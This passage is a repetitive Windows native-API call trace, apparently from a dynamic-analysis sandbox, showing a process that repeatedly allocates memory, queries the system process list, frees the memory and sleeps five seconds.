returned 0x0 [0277.189] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.189] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.190] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.190] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.190] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.195] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.196] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.197] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.197] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.198] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.199] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.199] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.203] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.204] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.207] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.207] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.208] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.208] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.213] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.214] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.216] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.216] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.217] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.223] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.224] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.224] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.225] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.230] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.231] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.234] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.234] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.235] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.235] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.241] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.242] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.244] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.245] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.245] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.250] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.251] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.253] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.254] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.259] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.260] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.261] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.261] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.262] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.262] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.263] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.267] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.268] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.321] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.323] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.323] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.329] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.330] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.332] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.332] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.333] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.338] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.339] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.341] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.341] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.342] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.343] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.343] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.348] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.349] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.351] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.351] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.352] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.352] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.353] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.357] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.358] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.360] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.374] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.374] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.375] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.380] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.381] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.383] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.384] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.384] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.385] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.385] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.390] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.391] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.393] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.393] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.394] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.394] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.399] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.400] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.401] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.402] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.403] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.407] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.409] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.410] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.411] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.412] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.416] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.417] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.419] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.419] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.421] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.427] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.428] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.429] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.430] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.431] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.435] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.436] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.439] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.439] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.439] NtQuerySystemInformation (in: 